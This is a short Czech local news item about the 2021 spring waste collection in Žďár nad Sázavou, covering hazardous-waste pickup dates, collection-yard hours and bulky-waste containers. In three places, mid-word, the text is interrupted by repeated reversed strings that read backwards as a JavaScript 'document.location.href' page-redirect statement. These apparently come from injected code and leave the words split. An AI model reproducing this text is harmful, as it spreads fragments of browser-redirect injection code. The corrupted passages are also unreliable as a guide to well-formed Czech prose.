Rainbow page separator

Jarní úklid Žďáru začne 8. dubna mobilním svozem odpadu

Neděle, 4. dubna 2021

Žďár nad Sázavou / Jarní úklid vypukne v druhém dubnovém týdnu ve Žďáře. Ve čtvrtek 8. dubna začne tradiční svoz nebezpečného odpadu, jenž se uskuteční do 10. dubna, a bližší informace typu kdy a kam lze odpad dopravit ke svozovým vozidlům jsou k dispozici na webu žďárské radnice. Při svozu je možné odložit pouze odpady, jako jsou kupříkladu rádia, televizory, ledničky, plechovky, nádoby od barev, laků, ředidel, zářivky, monočlánky, akumulá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory a jiné obaly znečištěné škodlivinami.
Nefunkční, ale stále kompletní elektrospotřebiče či třeba i staré pneumatiky, se odevzdávají ve sběrném dvoře k dalšímu využití. Nekompletní elektro skončí na skládce a měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to za jejich uložení platí. Veškeré odpady mohou lidé odkládat ve sběrném dvoře i po skončení jarního mobilního svozu, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vždy od pondělí od pátku v době od 6 do 17 hodin a v sobotu od 7 do 13 hodin.
Od pondělí 12. dubna až do 24. dubna budou v rámci jarního úklidu po městě rozmístěny kontejnery na objemný odpad a odpad ze zeleně. Objemný odpad poté čeká odvoz na skládku komunálního odpadu do Ronova nad Sázavou a odpad ze zeleně poputuje do žďárské bioplynové stanice.